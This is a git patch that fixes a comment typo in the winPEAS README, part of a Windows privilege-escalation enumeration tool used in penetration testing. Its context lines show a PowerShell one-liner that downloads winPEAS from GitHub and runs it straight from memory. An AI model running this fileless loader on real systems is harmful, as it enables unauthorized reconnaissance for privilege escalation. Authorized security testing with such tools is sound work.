From 7c9f4316490a1712af3b0c6d9e4a50650cb1fb53 Mon Sep 17 00:00:00 2001 From: jtothef <21988712+jtothef@users.noreply.github.com> Date: Tue, 23 Sep 2025 12:49:05 -0500 Subject: [PATCH] Update README.md Fix typo --- winPEAS/winPEASexe/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md index 82cd4d9..8dd211c 100755 --- a/winPEAS/winPEASexe/README.md +++ b/winPEAS/winPEASexe/README.md @@ -22,7 +22,7 @@ $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany # One liner to download and execute winPEASany from memory in a PS shell $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") -# The cprevios cmd in 2 lines +# The previous cmd in 2 lines $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use